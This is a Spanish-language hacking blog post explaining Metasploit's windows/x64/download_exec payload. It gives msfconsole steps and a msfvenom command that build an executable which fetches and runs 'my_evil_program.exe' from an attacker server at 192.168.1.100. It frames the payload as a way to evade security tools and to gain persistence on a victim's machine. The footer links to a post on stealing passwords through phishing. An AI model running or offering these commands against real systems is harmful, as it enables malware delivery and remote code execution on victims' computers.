Hacking metasploit modulo Windows Download Execute

 

www.onlinetis.com

Hacking metasploit modulo Windows Download Execute.

El uso del payload windows/x64/download_exec en Metasploit.

Este payload es un módulo de Metasploit que permite a un atacante descargar y ejecutar un archivo ejecutable (.exe) en un sistema Windows de 64 bits.

Aquí te explico cómo funciona y cómo se usa:

Descripción del Payload

El payload windows/x64/download_exec es un shellcode que se ejecuta en la memoria de la víctima. Su función principal es descargar un archivo ejecutable desde una URL específica y ejecutarlo en segundo plano. Esto es útil para:

  • Evadir la detección: El payload en sí es pequeño y simple, y la carga maliciosa real se descarga después, lo que puede ayudar a evadir algunas soluciones de seguridad.

  • Post-explotación: Es una forma rápida de mover un payload más grande, como un meterpreter, al sistema de la víctima una vez que se ha obtenido acceso inicial.

  • Flexibilidad: Permite al atacante cambiar el ejecutable que se descarga sin tener que generar un nuevo payload.

Opciones del Payload

Para usar este payload, debes configurar las siguientes opciones:

  • URL: La URL donde se encuentra el archivo ejecutable que deseas descargar. Por ejemplo, http://192.168.1.100/malware.exe.

  • FILENAME: El nombre con el que se guardará el archivo en el sistema de la víctima. Es opcional, y si no se especifica, el nombre del archivo se tomará de la URL.

  • CMD_TIMEOUT: El tiempo de espera en segundos para la ejecución del comando de descarga.

Ejemplo de Uso en Metasploit

A continuación, se muestra un ejemplo básico de cómo se usa este payload dentro de la consola de Metasploit (msfconsole):

  1. Cargar el exploit: Primero, debes seleccionar un exploit que te permita entregar este payload. Por ejemplo, un exploit de vulnerabilidad en un navegador web o un ataque de phishing con un archivo PDF malicioso.

    Bash
    msf6 > use exploit/multi/handler
    msf6 exploit(multi/handler) > set PAYLOAD windows/x64/download_exec
    
  2. Configurar las opciones del payload:

    Bash
    msf6 exploit(multi/handler) > set URL http://192.168.1.100/my_evil_program.exe
    msf6 exploit(multi/handler) > set LHOST 192.168.1.100
    msf6 exploit(multi/handler) > set LPORT 4444
    
    • Nota: LHOST y LPORT se usan en el contexto de un handler para escuchar la conexión inversa, aunque este payload no establece una.

  3. Generar el payload: Ahora, puedes generar el payload y exportarlo a un archivo.

    Bash
    msf6 exploit(multi/handler) > generate -f raw -o payload.bin
    

    También puedes generar el payload directamente con msfvenom:

    Bash
    msfvenom -p windows/x64/download_exec URL=http://192.168.1.100/my_evil_program.exe -f exe -o final_payload.exe
    

En este caso, msfvenom crea un archivo exe que, al ejecutarse en la máquina de la víctima, descargará y ejecutará my_evil_program.exe desde tu servidor web (192.168.1.100).

Resumen

El payload windows/x64/download_exec es una herramienta eficiente para la ejecución remota de código (RCE). Permite al atacante cargar un ejecutable secundario en el sistema de la víctima, facilitando la escalada de privilegios o el establecimiento de una conexión persistente.

Entradas populares de este blog

Ciberseguridad y hacking con Whatweb

Como robar contraseñas haciendo un phishing web

Arsenal software hacking NFC